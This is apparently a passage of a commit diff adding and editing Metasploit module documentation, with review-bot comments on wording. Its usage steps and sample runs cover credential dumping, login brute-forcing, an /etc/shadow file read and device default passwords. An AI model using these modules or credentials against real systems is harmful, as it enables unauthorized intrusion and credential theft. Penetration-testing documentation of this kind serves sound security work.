Cerberus Helpdesk User Credentials
==================================
Username Password Hash
-------- -------------
bar@none.com 37b51d194a7513e45b56f6524f2d51f2
foo@none.com acbd18db4cc2f85cedef654fccc4a4d8
admin@example.com 18126e7bd3f84b3f3e4df094def5b7de
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
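Review bot: the third credential in the 5.4.4 scenario is inconsistent: the `[+] Found:` line reports `mike@shorebreaksecurity.com` for hash `18126e7bd3f84b3f3e4df094def5b7de`, while the table below lists the same hash under `admin@example.com`. The output was evidently redacted in one place but not the other; redact both the same way, and replace `1.1.1.1` in the first scenario, a live public address, with a documentation or RFC 1918 address. The 4.2.3 scenario also deserves one explanatory sentence: the `[-] Invalid response received for 1.1.1.1 for /storage/tmp/devblocks_cache---ch_workers` line is expected there, since the devblocks path is tried before the zend path, and a reader could otherwise read it as a failed run. Wording: `The contents looks similar to JSON, however it is not` should be `The contents look similar to JSON, but it is not JSON`, the sentence ending in `version 6.7` lacks a period, and the `* of note` bullet reads better as a plain sentence.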

View File

@ -0,0 +1,87 @@
This module downloads PDF files and extracts the author's name from the document metadata.
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/http_pdf_authors`
3. Do: `set URL [URL]`
4. Do: `run`
## Options
**URL**
The URL of a PDF to analyse.
**URL_LIST**
File containing a list of PDF URLs to analyze.
**OUTFILE**
File to store extracted author names.
## Scenarios
### URL
```
msf auxiliary(http_pdf_authors) > set url http://127.0.0.1/test4.pdf
url => http://127.0.0.1/test4.pdf
msf auxiliary(http_pdf_authors) > run
[*] Processing 1 URLs...
[*] Downloading 'http://127.0.0.1/test4.pdf'
[*] HTTP 200 -- Downloaded PDF (38867 bytes)
[+] PDF Author: Administrator
[*] 100.00% done (1/1 files)
[+] Found 1 authors: Administrator
[*] Auxiliary module execution completed
```
### URL_LIST with OUTFILE
```
msf auxiliary(http_pdf_authors) > set outfile /root/output
outfile => /root/output
msf auxiliary(http_pdf_authors) > set url_list /root/urls
url_list => /root/urls
msf auxiliary(http_pdf_authors) > run
[*] Processing 8 URLs...
[*] Downloading 'http://127.0.0.1:80/test.pdf'
[*] HTTP 200 -- Downloaded PDF (89283 bytes)
[*] 12.50% done (1/8 files)
[*] Downloading 'http://127.0.0.1/test2.pdf'
[*] HTTP 200 -- Downloaded PDF (636661 bytes)
[+] PDF Author: sqlmap developers
[*] 25.00% done (2/8 files)
[*] Downloading 'http://127.0.0.1/test3.pdf'
[*] HTTP 200 -- Downloaded PDF (167478 bytes)
[+] PDF Author: Evil1
[*] 37.50% done (3/8 files)
[*] Downloading 'http://127.0.0.1/test4.pdf'
[*] HTTP 200 -- Downloaded PDF (38867 bytes)
[+] PDF Author: Administrator
[*] 50.00% done (4/8 files)
[*] Downloading 'http://127.0.0.1/test5.pdf'
[*] HTTP 200 -- Downloaded PDF (34312 bytes)
[+] PDF Author: ekama
[*] 62.50% done (5/8 files)
[*] Downloading 'http://127.0.0.1/doesnotexist.pdf'
[*] HTTP 404 -- Downloaded PDF (289 bytes)
[-] Could not parse PDF: PDF is malformed
[*] 75.00% done (6/8 files)
[*] Downloading 'https://127.0.0.1/test.pdf'
[-] Connection failed: Failed to open TCP connection to 127.0.0.1:443 (Connection refused - connect(2) for "127.0.0.1" port 443)
[*] Downloading 'https://127.0.0.1:80/test.pdf'
[-] Connection failed: SSL_connect returned=1 errno=0 state=unknown state: unknown protocol
[+] Found 4 authors: sqlmap developers, Evil1, Administrator, ekama
[*] Writing data to /root/output...
[*] Auxiliary module execution completed
```
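Review bot: the `doesnotexist.pdf` entry in the URL_LIST scenario shows `HTTP 404 -- Downloaded PDF (289 bytes)` followed by `Could not parse PDF: PDF is malformed`, which means the 404 error page was handed to the PDF parser. The module should skip non-200 responses rather than try to parse them; if that behaviour is kept, the doc should at least say that such URLs show up as parse failures. Smaller points: the file has no `## Description` heading unlike the other docs in this commit, and `analyse` (under URL) and `analyze` (under URL_LIST) should use one spelling.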

View File

@ -0,0 +1,53 @@
## Description
This module retrieves user credentials from BearWare TeamTalk.
Valid administrator credentials are required.
Starting from version 5, TeamTalk allows users to login using a username and password combination. The username and password are stored on the server in clear text and can be retrieved remotely by any user with administrator privileges.
## Vulnerable Application
[TeamTalk 5](http://www.bearware.dk/) is a freeware conferencing system which allows multiple users to participate in audio and video conversations. The TeamTalk install file includes both client and server application. A special client application is included with accessibility features for visually impaired.
This module has been tested successfully on TeamTalk versions 5.2.2.4885 and 5.2.3.4893.
The TeamTalk software is available on the [BearWare website](http://www.bearware.dk/) and on [GitHub](https://github.com/BearWare/TeamTalk5).
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/teamtalk_creds`
3. Do: `set rhost <RHOST>`
4. Do: `set rport <RPORT>` (default: `10333`)
5. Do: `set username <USERNAME>` (default: `admin`)
6. Do: `set password <PASSWORD>` (default: `admin`)
7. Do: `run`
8. You should get credentials
## Scenarios
```
[*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2)
[+] 172.16.191.166:10333 - Authenticated successfully
[+] 172.16.191.166:10333 - User is an administrator
[*] 172.16.191.166:10333 - Found 5 users
TeamTalk User Credentials
=========================
Username Password Type
-------- -------- ----
debbie 1234567890 1
murphy 934txs 2
quinn ~!@#$%^&*()_+{}|:" <>?;',./ 2
sparks password 2
stormy 1
[+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt
[*] Auxiliary module execution completed
```
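Review bot: the `Type` column in the scenario table (`1` and `2`) is never explained; add a line under Scenarios or Description saying what the values mean, since the reader cannot tell which of the listed accounts are administrators. Also `A special client application is included with accessibility features for visually impaired` should read `for the visually impaired`, and `includes both client and server application` should be `applications`.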

View File

@ -57,9 +57,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
3. Do: ```set RPORT [IP]``` 3. Do: ```set RPORT [IP]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
### On vsFTPd 3.0.3 on Kali ### vsFTPd 3.0.3 on Kali
``` ```
msf > use auxiliary/scanner/ftp/anonymous msf > use auxiliary/scanner/ftp/anonymous
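Review bot: the context line `3. Do: set RPORT [IP]` uses the wrong placeholder; RPORT takes a port, so it should be `[PORT]` as in the other scanner docs in this commit. The same `[IP]` placeholder appears in the ftp_login and ftp_version hunks below, so fix all three while these files are being touched.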

View File

@ -47,7 +47,8 @@ This module will test FTP logins on a range of machines and report successful lo
3. Do: ```set RPORT [IP]``` 3. Do: ```set RPORT [IP]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf> use auxiliary/scanner/ftp/ftp_login msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org

View File

@ -47,9 +47,9 @@ This module allows us to scan through a series of IP Addresses and provide detai
3. Do: ```set RPORT [IP]``` 3. Do: ```set RPORT [IP]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
### On vsFTPd 3.0.3 on Kali ### vsFTPd 3.0.3 on Kali
``` ```
msf > use auxiliary/scanner/ftp/ftp_version msf > use auxiliary/scanner/ftp/ftp_version

View File

@ -1,4 +1,13 @@
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found. This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials.
There are four (4) default accounts:
1. root/root
2. admin/1
3. alg/1
4. user/1
In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file.
The module attempts to download configuration and password files depending on the login user credentials found.
## Verification Steps ## Verification Steps
@ -7,7 +16,7 @@ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Qual
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/binom3_login_config_pass_dump msf > use auxiliary/scanner/http/binom3_login_config_pass_dump

View File

@ -0,0 +1,59 @@
## Description
This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
## Vulnerable Application
[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
[Inedo website](http://inedo.com/)
## Verification Steps
1. Do: ```use auxiliary/scanner/http/buildmaster_login```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: Set credentials
5. Do: ```run```
6. You should see the module attempting to log in.
## Scenarios
### Attempt to login with the default credentials.
```
msf > use auxiliary/scanner/http/buildmaster_login
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
RHOSTS => 10.0.0.39
msf auxiliary(buildmaster_login) > run
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(buildmaster_login) >
```
### Brute force with credentials from file.
```
msf > use auxiliary/scanner/http/buildmaster_login
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
RHOSTS => 10.0.0.39
msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
USERPASS_FILE => ~/BuildMasterCreds.txt
msf auxiliary(buildmaster_login) > run
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test"
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test"
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong"
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong"
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(buildmaster_login) >
```
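Review bot: step 4 `Do: Set credentials` is vague where the other docs name the options; list the datastore options the module accepts (the second scenario shows `USERPASS_FILE`; name the single-credential options too). The scenario headings `### Attempt to login with the default credentials.` and `### Brute force with credentials from file.` should not end in periods, and `login` as a verb is `log in`.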

View File

@ -6,9 +6,9 @@ This module is a scanner which enumerates Google Chromecast via its HTTP interfa
2. Do: ```set RHOSTS [IP]``` 2. Do: ```set RHOSTS [IP]```
3. Do: ```run``` 3. Do: ```run```
## Sample Output ## Scenarios
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) ### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
``` ```
msf > use auxiliary/scanner/http/chromecast_webserver msf > use auxiliary/scanner/http/chromecast_webserver
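Review bot: the note `Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)` has been turned into a `###` heading, which leaves a full sentence as a section title; keep it as a sentence under a short heading such as `### Three first-generation Chromecasts` instead. The chromecast_wifi hunk below makes the identical change and should get the same treatment.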

View File

@ -6,9 +6,9 @@ This module is a scanner which enumerates WiFi access points visible from a Goog
2. Do: ```set RHOSTS [IP]``` 2. Do: ```set RHOSTS [IP]```
3. Do: ```run``` 3. Do: ```run```
## Sample Output ## Scenarios
Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) ### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
``` ```
msf > use auxiliary/scanner/http/chromecast_wifi msf > use auxiliary/scanner/http/chromecast_wifi

View File

@ -17,7 +17,7 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862
1. Make sure Cisco Firepower Management console's HTTPS service is running 1. Make sure Cisco Firepower Management console's HTTPS service is running
2. Start ```msfconsole``` 2. Start ```msfconsole```
3. ```use auxiliary/scanner/http/cisco_firepower_login.rb 3. ```use auxiliary/scanner/http/cisco_firepower_login.rb```
4. ```set RHOSTS [IP]``` 4. ```set RHOSTS [IP]```
5. Set credentials 5. Set credentials
6. ```run``` 6. ```run```
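Review bot: this closes the unterminated backticks on step 3, but the command still carries the `.rb` extension (`use auxiliary/scanner/http/cisco_firepower_login.rb`); every other doc in this commit gives the module path without `.rb`, so drop the extension here as well.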

View File

@ -34,9 +34,10 @@ You can use any web application to test the crawler.
4. Do: ```set URI [PATH]``` 4. Do: ```set URI [PATH]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
### Example against [WebGoat](https://github.com/WebGoat/WebGoat) ### Example against [WebGoat](https://github.com/WebGoat/WebGoat)
``` ```
msf> use auxiliary/scanner/http/crawler msf> use auxiliary/scanner/http/crawler
msf auxiliary(crawler) > set RHOST 127.0.0.1 msf auxiliary(crawler) > set RHOST 127.0.0.1
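Review bot: the verification steps in the context number both `set URI [PATH]` and `run` as `4.`; renumber `run` to `5.` while this file is being edited.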

View File

@ -1,4 +1,9 @@
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to execute arbitrary system commands. This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
It requires any one of the following login credentials to execute arbitrary system commands:
1. admin/admin
2. installer/installer
3. home/home
## Verification Steps ## Verification Steps
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/epmp1000_cmd_exec msf > use auxiliary/scanner/http/epmp1000_cmd_exec

View File

@ -1,4 +1,5 @@
This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly. This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file. This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly.
This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file.
## Verification Steps ## Verification Steps
@ -7,7 +8,7 @@ This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/epmp1000_dump_config msf > use auxiliary/scanner/http/epmp1000_dump_config

View File

@ -1,4 +1,9 @@
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to dump system hashes. This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal.
It requires any one of the following login credentials to dump system hashes:
1. admin/admin
2. installer/installer
3. home/home
## Verification Steps ## Verification Steps
@ -7,7 +12,7 @@ This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/epmp1000_dump_hashes msf > use auxiliary/scanner/http/epmp1000_dump_hashes

View File

@ -1,4 +1,5 @@
This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials. Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly. This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials.
Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly.
## Verification Steps ## Verification Steps
@ -7,7 +8,7 @@ This module scans for Cambium ePMP 1000 management login portal(s), and attempts
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/epmp1000_web_login msf > use auxiliary/scanner/http/epmp1000_web_login

View File

@ -1,11 +1,13 @@
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration.
A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db.
This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
Vulnerable firmware versions include: Vulnerable firmware versions include:
VMU-C EM prior to firmware Version A11_U05 * VMU-C EM prior to firmware Version A11_U05
VMU-C PV prior to firmware Version A17. * VMU-C PV prior to firmware Version A17.
## Verification Steps ## Verification Steps
@ -14,7 +16,7 @@ VMU-C PV prior to firmware Version A17.
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/gavazzi_em_login_loot msf > use auxiliary/scanner/http/gavazzi_em_login_loot
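Review bot: in the first line, `and attempt to extract the SMTP configuration` should be `attempts`, agreeing with `scans`, `performs` and `enumerates` earlier in the same sentence.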

View File

@ -1,4 +1,5 @@
Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal. Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability.
The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases. Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
@ -9,7 +10,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin

View File

@ -11,7 +11,8 @@ This module dumps memory contents using a crafted Range header and affects only
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125 msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125

View File

@ -1,4 +1,5 @@
This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method. This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS.
It is typically faster than the traditional form-based OWA login method.
## Verification Steps ## Verification Steps
@ -7,7 +8,7 @@ This module is for password guessing against OWA's EWS service which often expos
3. Set TARGETURI if necessary. 3. Set TARGETURI if necessary.
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf auxiliary(owa_ews_login) > run msf auxiliary(owa_ews_login) > run

View File

@ -0,0 +1,57 @@
This module exploits an authenticated arbitrary file read in the log module's filter engine.
## Vulnerable Application
The application is available for a 90 day evaluation after free registration from
[riverbed](https://www.riverbed.com/gb/products/steelhead/Free-90-day-Evaluation-SteelHead-CX-Virtual-Edition.html).
Downloads are available for Hyper-V, ESX(i), and KVM. Installation is straight forward, initial login is `admin`/`password`.
If need be from cli, to show the IP address of the device: `show interfaces primary`
This module was successfully tested against:
- SteelHead VCX (VCX255U) 9.6.0a
## Verification Steps
1. Do: ```auxiliary/scanner/http/riverbed_steelhead_vcx_file_read```
2. Do: ```set RHOSTS [IP]```
3. Set TARGETURI if necessary.
3. Set FILE if necessary.
3. Set USERNAME if necessary.
3. Set PASSWORD if necessary.
4. Do: ```run```
## Scenarios
### SteelHead VCX255u 9.6.0a running on ESXi
```
resource (riverbed.rc)> use auxiliary/scanner/http/riverbed_steelhead_vcx_file_read
resource (riverbed.rc)> set rhosts 192.168.2.198
rhosts => 192.168.2.198
resource (riverbed.rc)> set verbose true
verbose => true
resource (riverbed.rc)> run
[*] CSRF Token: 18PK64EKpo4d6y0X5ZOMYJ3fxfYZKfrN
[+] Authenticated Successfully
[+] File Contents:
admin:$6$sKOU5moa$B2szxiSEzq6ZmHZw01CMf64WlzvqIgCYETeXzF1ItxZ5soOJNVXdE2H5N19t0cPeGDf/LGvRymgQHAxgojr6u1:10000:0:99999:7:::
administrator:*:10000:0:99999:7:::
apache:*:10000:0:99999:7:::
localvixuser:*:10000:0:99999:7:::
named:*:10000:0:99999:7:::
nobody:*:10000:0:99999:7:::
ntp:*:10000:0:99999:7:::
pcap:*:10000:0:99999:7:::
postgres:*:10000:0:99999:7:::
rcud:*:10000:0:99999:7:::
root:*:10000:0:99999:7:::
rpc:*:10000:0:99999:7:::
shark:*:10000:0:99999:7:::
sshd:*:10000:0:99999:7:::
statsd:*:10000:0:99999:7:::
webproxy::10000:0:99999:7:::
[+] Stored /etc/shadow to /root/.msf4/loot/20170602230238_default_192.168.2.198_host.file_311580.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
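Review bot: the Verification Steps list numbers four different steps as "3." (TARGETURI, FILE, USERNAME, PASSWORD), and step 1 reads `auxiliary/scanner/http/riverbed_steelhead_vcx_file_read` without the leading `use`; renumber the list 1 through 7 and make step 1 `use auxiliary/scanner/http/riverbed_steelhead_vcx_file_read`. Two smaller points in the same file: the text never says which file the module reads when FILE is left alone, even though the sample run loots `/etc/shadow`, so the default is worth stating next to the FILE step; and "SteelHead VCX255u" in the Scenarios heading should match "VCX255U" used under Vulnerable Application ("straight forward" should also be "straightforward").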

@ -25,7 +25,8 @@ is extremely common.
You can set the test path where the scanner will try to find `robots.txt` file. You can set the test path where the scanner will try to find `robots.txt` file.
Default is `/` Default is `/`
## Sample Output ## Scenarios
``` ```
msf> use auxiliary/scanner/http/robots_txt msf> use auxiliary/scanner/http/robots_txt
msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238 msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238

@ -0,0 +1,70 @@
## Description
This module exploits a vulnerability in the WebNews web interface of SurgeNews on TCP ports 9080 and 8119 which allows unauthenticated users to download arbitrary files from the software root directory; including the user database, configuration files and log files.
This module extracts the administrator username and password, and the usernames and passwords or password hashes for all users.
## Vulnerable Application
[SurgeNews](http://netwinsite.com/surgenews/) is a high performance, fully threaded, next generation News Server with integrated WebNews interface.
This module has been tested successfully on:
* SurgeNews version 2.0a-13 on Windows 7 SP 1.
* SurgeNews version 2.0a-12 on Ubuntu Linux.
Installers:
* [SurgeNews Installers](http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgenews)
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/scanner/http/surgenews_user_creds`
3. Do: `set rhosts [IP]`
4. Do: `run`
5. You should get credentials
## Scenarios
```
msf > use auxiliary/scanner/http/surgenews_user_creds
msf auxiliary(surgenews_user_creds) > set rhosts 172.16.191.133 172.16.191.166
rhosts => 172.16.191.133 172.16.191.166
msf auxiliary(surgenews_user_creds) > run
[+] Found administrator credentials (admin:admin)
SurgeNews User Credentials
==========================
Username Password Password Hash Admin
-------- -------- ------------- -----
admin admin true
qwerty@bt {ssha}BuFLjIFUUSy1IltX3AuN420qV2ZFU7EL false
user@bt {ssha}HFTkDsnNlLiaHN+sIS9VQarVGGXmYISn false
[+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.133_surgenews.user.c_633569.txt
[*] Scanned 1 of 2 hosts (50% complete)
[+] Found administrator credentials (test:test)
[+] Found user credentials (zxcv@win-sgbsd5tqutq:zxcv)
SurgeNews User Credentials
==========================
Username Password Password Hash Admin
-------- -------- ------------- -----
asdf@win-sgbsd5tqutq {ssha}8ytixKjxf3kaBc6T471R1Re/C8MUnKnF false
test test true
test@win-sgbsd5tqutq {ssha}Vw8EkFxAJuiZrb98Fz+sdr/yEEmBZ2Jc false
test@win-sgbsd5tqutq {ssha}j4teSf4CgA3+XVRJscFHyqoOQJRoLg4K false
zxcv@win-sgbsd5tqutq zxcv false
[+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.166_surgenews.user.c_077983.txt
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```
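Review bot: the Vulnerable Application section lists only the two builds the module was tested on (2.0a-13 on Windows, 2.0a-12 on Ubuntu) and gives no affected-version range, fixed release or vendor/advisory reference for the unauthenticated file download described in the first paragraph, so a reader cannot tell whether current SurgeNews releases are still exposed; add the range and a reference, or state explicitly that no fix is known. Minor: "Windows 7 SP 1" should be "Windows 7 SP1", and the semicolon in "software root directory; including the user database" should be a comma.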

@ -9,7 +9,7 @@ The vulnerability is due to insufficient condition checks in the part of the cod
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf auxiliary(cisco_ike_benigncertain) > show options msf auxiliary(cisco_ike_benigncertain) > show options

@ -0,0 +1,30 @@
## Vulnerable Application
Any system exposing the Cisco Smart Install (SMI) protocol, which typically runs on TCP port 4786.
## Verification Steps
1. Do: ```use auxiliary/scanner/misc/cisco_smart_install```
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
3. Do: ```run```
4. If the host is exposing an identifiable SMI instance, it will print the endpoint.
## Scenarios
```
msf auxiliary(cisco_smart_install) > run
[*] Scanned 57 of 512 hosts (11% complete)
[*] Scanned 105 of 512 hosts (20% complete)
[*] Scanned 157 of 512 hosts (30% complete)
[*] Scanned 212 of 512 hosts (41% complete)
[*] Scanned 256 of 512 hosts (50% complete)
[*] Scanned 310 of 512 hosts (60% complete)
[*] Scanned 368 of 512 hosts (71% complete)
[*] Scanned 413 of 512 hosts (80% complete)
[*] Scanned 466 of 512 hosts (91% complete)
[+] a.b.c.d:4786 - Fingerprinted the Cisco Smart Install protocol
[*] Scanned 512 of 512 hosts (100% complete)
[*] Auxiliary module execution completed
```
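Review bot: step 2 of the Verification Steps, `set [RHOSTS]`, is not a valid msfconsole command because it drops the option name; it should read `set RHOSTS [RHOSTS]` (option, then the hosts to test), otherwise a reader copying the steps gets an error. The same wording appears in the rdp_scanner document added in this commit and should be fixed there too. The Scenarios block uses `a.b.c.d` for the one fingerprinted host, which is fine, but the text could say that only the endpoint is printed (no version or device information), since that is what the reader will see.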

@ -0,0 +1,42 @@
## Description
This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension.
This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.
If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
## Vulnerable Application
This module has been tested successfully on:
* [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
* [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
* [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.
## Verification Steps
1. Do: `use auxiliary/scanner/nntp/nntp_login`
2. Do: `set RHOSTS [IP]`
3. Do: `set RPORT [IP]`
4. Do: `run`
## Scenarios
```
msf auxiliary(nntp_login) > run
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
[*] Scanned 1 of 2 hosts (50% complete)
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```
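Review bot: step 3 of the Verification Steps reads `set RPORT [IP]`; the placeholder should be `[PORT]` (the Scenarios output shows the NNTP default of 119/TCP). The steps also never mention setting any credential options, so as written the reader cannot tell where the `asdf`/`zxcv`/`test` and `user`/`pass` pairs in the output came from; add a step for the username/password (or wordlist) options before `run`. "Windows 7 SP 1" should be "Windows 7 SP1", as in the surgenews document.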

@ -0,0 +1,59 @@
## Description
This module will attempt to initiate a TCP/IP connection with ports on the victim machine. It is this done by sending a SYN packet, and if victim replies with a SYN/ACK packet
that means the port is open. Then the attacker sends a RST packet, and as a result the victim's machine assumes that there is a communication error.
The attacker now knows the state of port without a full tcp connection. Major benefit of TCP SYN scan is that most logging applications do not log the TCP/RST by default.
## Options
**PORTS**
This is the list of TCP ports to test on each host.
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
options is to scan `1-10000` ports.
**TIMEOUT**
Maximum time to wait for a response. The default value is 500 milliseconds.
**VERBOSE**
Gives detailed message about the scan of all the ports. It also shows the
ports that were closed.
## Verification Steps
1. Do: `use auxiliary/scanner/portscan/syn`
